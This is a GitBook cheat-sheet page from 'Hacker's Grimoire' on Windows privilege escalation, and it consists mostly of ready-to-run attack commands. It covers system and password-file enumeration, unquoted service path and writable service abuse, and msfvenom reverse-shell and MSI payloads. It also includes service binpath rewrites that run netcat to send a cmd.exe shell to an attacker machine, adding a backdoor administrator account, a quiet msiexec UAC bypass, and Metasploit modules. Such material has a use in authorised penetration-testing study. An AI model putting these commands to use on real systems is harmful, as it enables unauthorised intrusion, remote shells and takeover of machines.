Hacker's Grimoire
Search…
Hacker's Grimoire
Reconnaissance
Exploitation
Post exploitation
Privilege escalation: Linux
Privilege escalation: Windows
Linux basics
Windows basics
Learning resources
Powered By GitBook
Privilege escalation: Windows
If you started hacking on Linux, Windows can be frustrating and weird. But that's what most networks are running, from desktops to domain controllers. So you just have to get used to it.

Gathering system information

Be warned, these commands will generate an overwhelming amount of information.

System information

Find out some basic information about the host:
1
systeminfo
2
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
3
hostname
4
echo %username%
5
net users
6
net user user1
Copied!
Output from the systeminfo command is useful for passing into script-based exploit suggesters (see below).

Active network connections

1
netstat -ano
Copied!

Firewall settings

1
netsh firewall show state
2
netsh firewall show config
Copied!

Scheduled tasks

1
schtasks /query /fo LIST /v
Copied!

Running processes

Running processes linked to services:
1
tasklist /SVC
Copied!
Running services:
1
net start
Copied!

Installed drivers

1
DRIVERQUERY
Copied!

Installed patches

1
wmic qfe get Caption,Description,HotFixID,InstalledOn
Copied!

Program permissions

Check if a program has insecure permissions (e.g. anyone can read/write):
1
icacls program.exe
2
program.exe NT AUTHORITY\SYSTEM:(I)(F)
3
BUILTIN\Administrators:(I)(F)
4
BUILTIN\Users:(I)(RX)
5
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
6
Everyone:(I)(F) # uh oh
Copied!

Interesting files

Search for files that contain ‘password’ in the filename:
1
dir /s *password*
Copied!
Search for the keyword ‘password’ in files with the .txt extension:
1
findstr /si password *.txt
Copied!

Unquoted service path

This is a common vulnerability for installed programs that don't put quotes around the file path to the executable:
1
C:\Program Files\Some Software\Software.exe #unquoted
2
​
3
"C:\Program Files\Some Software\Software.exe"
Copied!
When Windows tries to locate the program, it guesses and tries to execute any word before a space. For example, in the unquoted service path above, Windows will try:
1
C:\Program.exe
2
​
3
C:\Program Files\Some.exe
4
​
5
C:\Program Files\Some Software\Software.exe
Copied!
An attacker could exploit this behaviour by putting a malicious program earlier in the file path so that Windows executes it before the legitimate one. In order for this to be successful, these conditions must be true:
  1. 1.
    There is a service with an unquoted binary path containing one or more spaces in the path
  2. 2.
    The current user has Write permissions for the folders containing spaces
  3. 3.
    There is a way to reboot the system or service in order to execute a payload
List all services with an unquoted service path:
1
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Copied!
If this returns a an unquoted service path, use icacls to check permissions on each directory in the path:
1
icacls "C:\Program Files\Some Software\"
Copied!
If you can write to this directory, you can replace the executable with malicious one called Some.exe. This principle also applies to higher folders in the directory structure, if you have write permissions ('C:\' and 'C:\Program Files\'.
You can create a malicious .exe that sends a reverse shell to your machine with Metasploit (assuming there is no antivirus, haha):
1
msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=[attack machine] LPORT=443 -f exe -o servicename.exe
Copied!
Then restart the service:
1
sc stop [service name]
2
​
3
sc start [service name]
Copied!
If you don't have permission to restart the service, you'll have to wait for a system reboot or a more privileged user to restart it.
If you're super lazy you can just use this Metasploit module: exploit/windows/local/trusted_service_path

Modifying binary service path

Similar to the unquoted service path vulnerability, you can attempt to modify the file path of a service and point it to a malicious executable in a writable directory.
Windows has a tool called named accesschk.exe which checks permissions. To display services which can be modified by an authenticated user:
1
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
Copied!
A service with write permissions for an authenticated user looks like this:
1
RW [service name] SERVICE_ALL_ACCESS
Copied!
Show the service properties:
1
sc qc [service name]
Copied!
This is where you can find out the BINARY_PATH_NAME value. Change the binary path on a particular service:
1
sc config [service name] binpath= "C:\tmp\nc.exe -nv [attack machine] 4444 -e C:\WINDOWS\System32\cmd.exe"
2
sc qc [service name]
3
sc stop [service name]
4
sc start [service name]
Copied!
If the service is disabled when you type in sc qc [service name] you can enable it using sc config SSDPSRV start= auto - note that there is a space between the = and the option.
Common errors include ftp-ing nc.exe without using the binary command first and using the wrong " in the path. If you're working with Windows XP, you'll need to download this version. Also, the Administrator shell fired using this method will not last, so you should send yourself another shell immediately with a different port:
1
C:\tmp\nc.exe -nv [attack machine] 80 -e C:\WINDOWS\System32\cmd.exe
Copied!
You can also add a new user and grant administrator rights using the binary path:
1
sc config [service name] binpath= "net user admin password /add"
2
sc stop [service name]
3
sc start [service name]
4
sc config [service name] binpath= "net localgroup Administrators admin /add"
5
sc stop [service name]
6
sc start [service name]
Copied!
Again, if you're super lazy here's a Metasploit Module: exploit/windows/local/service_permissions

AlwaysInstallElevated setting

Windows registry has a setting that allows non-privileged users to install Microsoft Windows Installer Package Files (MSI) with elevated system permissions. There are 2 registry entries which have to be set to 1 to enable this setting.
Check the values of the registry keys:
1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
2
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Copied!
If AlwaysInstallElevated is enabled in the registry entries you can create an installer payload with msfvenom (again assuming there is no antivirus):
1
msfvenom -p windows/adduser USER=admin PASS=password -f msi –o filename.msi
Copied!
Generate a payload with a reverse shell:
1
msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=[attacking host] LPORT=443 -f msi -o filename.msi
Copied!
Then use the following command to execute the msi installer file:
1
msiexec /quiet /qn /i C:\Users\filename.msi
Copied!
A summary of these flags:
  • /quiet will bypass User Account Control (UAC)
  • /qn specifies not to use a GUI
  • /i is to perform a regular installation of the package
For the lazy, here's a Metasploit module: exploit/windows/local/always_install_elevated

Unattended Installs

Unattended Installs allows administrators to deploy Windows in a hands-off way. However, if they don't clean up after this process, an XML file called Unattend is left on the local system, full of configuration settings and possibly local account configurations (e.g. Administrators).
Unattend files are often found in these folders:
1
C:\Windows\Panther\
2
C:\Windows\Panther\Unattend\
3
C:\Windows\System32\
4
C:\Windows\System32\sysprep\
Copied!
Common filenames:
1
unattend.xml
2
sysprep.xml
3
sysprep.inf
Copied!
Passwords in these files may be base64 encoded, decode them here or in Burp Decoder.
And if you're lazy, a Metasploit module: post/windows/gather/enum_unattend

BypassUAC Metasploit module

If you have a meterpreter shell and getsystem isn't working, you can try this method, which uses the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.
First background your meterpreter session:
1
background
Copied!
Then set the UAC bypass module:
1
use exploit/windows/local/bypassuac
Copied!
Set the session ID and the listening host IP:
1
set session [Session ID]
2
set lhost [attacking host]
3
run
Copied!
This will spawn a second shell with UAC disabled, which might help you get NT/AUTHORITY\SYSTEM
1
getsystem
Copied!

Scripts

Windows Exploit Suggester

Windows Exploit Suggester is a tool to identify missing patches and associated exploits on a Windows host. It uses the output of systeminfo and compares it against the Microsoft vulnerability database, which is automatically downloaded and stores as a spreadsheet. Based on the output, the tool lists public exploits (E) and Metasploit modules (M).
If you don't have it, you can clone the git repository:
1
git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
Copied!
You may need to install the python-xlrd dependency for parsing Excel spreadsheets:
1
apt-get update
2
apt-get install python-xlrd
Copied!
Change the working directory to the Windows Exploit Suggester directory and run the updater:
1
python windows-exploit-suggester.py --update
Copied!
At that point, you should run systeminfo on the victim machine and save the contents as a text file:
1
systeminfo
Copied!
Then run Windows Exploit Suggester to find vulnerabilities:
1
python windows-exploit-suggester.py --database 2018-02-08-mssb.xls --systeminfo sysinfo.txt
Copied!
As with any script-based exploit suggester, there are false positives and junk data. To reduce the output to local vulnerabilities, add the --local option
1
python windows-exploit-suggester.py --database 2018-02-08-mssb.xls --systeminfo sysinfo.txt --local
Copied!
Similarly, to filter output to remote vulnerabilities use --remote:
1
python windows-exploit-suggester.py --database 2018-02-08-mssb.xls --systeminfo sysinfo.txt --remote
Copied!

WMI hotfixes

If can't retrieve installed hotfixes from systeminfo you can find installed patches using the WMI command-line (WMIC) utility:
1
wmic qfe list full
Copied!
Store the output in a file named and run Windows Exploit Suggester with the following options:
1
python windows-exploit-suggester.py --database 2018-02-08-mssb.xls --systeminfo sysinfo.txt --hotfixes hotfixes.txt
Copied!

Metasploit local exploit suggester

If you have a Meterpreter shell running, you can discover local exploits:
1
meterpreter > run post/multi/recon/local_exploit_suggester
Copied!
The output is okay, but there seem to be a lot of false positives and incorrect versions.

Powersploit Privesc

This one might also be useful but I haven't tried it yet:
​PowerSploit Privesc​
If you have a Windows exploit written in python, you can create an executable by installing PyWin32 and then extracting and running the pyinstaller module:
1
python pyinstaller.py --onefile ms11-080.py
Copied!

Further reading

Previous
Privilege escalation: Linux
Next
Linux basics
Last modified 3yr ago
Copy link
Contents
Gathering system information
System information
Active network connections
Firewall settings
Scheduled tasks
Running processes
Installed drivers
Installed patches
Program permissions
Interesting files
Unquoted service path
Modifying binary service path
AlwaysInstallElevated setting
Unattended Installs
BypassUAC Metasploit module
Scripts
Windows Exploit Suggester
Metasploit local exploit suggester
Powersploit Privesc
Further reading